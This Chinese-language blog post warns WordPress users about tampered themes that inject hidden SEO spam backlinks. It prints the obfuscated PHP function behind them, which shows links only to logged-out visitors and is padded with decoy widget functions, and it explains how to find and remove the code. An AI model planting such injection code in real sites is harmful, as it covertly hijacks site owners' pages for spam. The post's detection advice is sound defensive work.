|
|
昨天通知我说“最近有朋友向我提及主题被修改问题”,因为涉及到用户安全问题,以便让更多的朋友知道并防范。
已收到第三位朋友提及网站底部出现“灵异”链接,一般表现为带链接的“Premium WordPress Themes”、“weboy”、“WordPress Themes”、“Free WordPress Themes”、“WordPress主题”、“WordPress Blog”几种形式。有一位朋友还是在我的主题上发现此问题,所以需要查清楚此事。
经过这位朋友发来的源代码已发现,是由于主题被修改过。目前仍不知道该代码是经 WordPress 插件传播,还是被第三方加上后发布,还是网站被黑造成。但是值得注意的是,请不要在非原官方的地方下载插件或者主题,以防代码已被修改过。另,请支持正版主题,被放出来的 Premium 级别的付费主题最有可能被修改代码。目前发现曾被修改的主题有 A-SuperCMS、iBlogPro 4、wpbus-D4。
解决方法:
请从Ftp下载主题文件夹,或者整站文件,使用Notepad++、Dreamweaver等软件搜索以下代码:
functionmytheme_clinkft(){$urls=array('web'.'oy.or'.'g/','them'.'es.we'.'bo'.'y.org/','th'.'emes.we'.'bo'.'y.org/','th'.'em'.'es.w'.'eb'.'oy.org/','th'.'eme'.'s.w'.'ebo'.'y.org/','wp'.'2'.'b'.'log.com/','zh'.'ut'.'i.we'.'bo'.'y.o'.'rg/');$urlst=array('We'.'b'.'oy','Wor'.'dPr'.'ess The'.'mes','Fre'.'e Wo'.'rdPr'.'ess Th'.'emes','Fr'.'ee Wor'.'dPre'.'ss T'.'he'.'me','Pr'.'emium Wor'.'dPre'.'ss Th'.'em'.'es','Wor'.'dPre'.'ss Blo'.'g','Wo'.'rdPr'.'ess主'.'题');srand(time());$random=(rand()%7);echo'< '.'a '.'cla'.'ss="cl'.'inkf'.'t" hr'.'ef="ht'.'tp'.':'.'/'.'/'.$urls[$random].'" t'.'itl'.'e="'.$urlst[$random].'">'.$urlst[$random].'< '.'/a'.'>';}if(!is_user_logged_in()){add_action('w'.'p_fo'.'ote'.'r','mytheme_clinkft');add_action('co'.'mmen'.'t_fo'.'rm','mytheme_clinkft');}
代码可能经常变化,若搜索不到,可以搜索当中的一些关键词。找到后将其删除即可。
该代码通常隐藏在模板的 function.php 文件中。该恶意代码的前后还有一些 function 是调用热门文章或者 widget,估计是为隐藏恶意代码加上去的。如:"_check_isactive_widget" "_get_allwidgetcont" "_getsprepare_widget" "__popular_posts",可一并删除。
若你在转换主题时提示 "Fatal error: Cannot redeclare _check_isactive_widget()"、"_get_allwidgetcont" 等错误,那你的代码很有很可能已被污染。
若你使用本站主题并发现有以上提及情况,请重新到本站重新下载主题及通知我们,谢谢!
黑链简介:
黑链是SEO黑帽手法中相当普遍的一种手段,笼统地说,它就是指一些人用非正常的手段获取的其它网站的反向链接,最常见的黑链就是通过各种网站程序漏洞获取搜索引擎权重或者PR较高的网站的Webshell,进而在被黑网站上链接自己的网站。
所以:各位朋友下载主题最好到这几个地方下载
1. WordPress 官方 http://wordpress.org/extend/themes/
2. 主题原作者网站
3. 一些大型的而且比较权威的主题网站
|
|
|
|
|
|
|
|
|
|
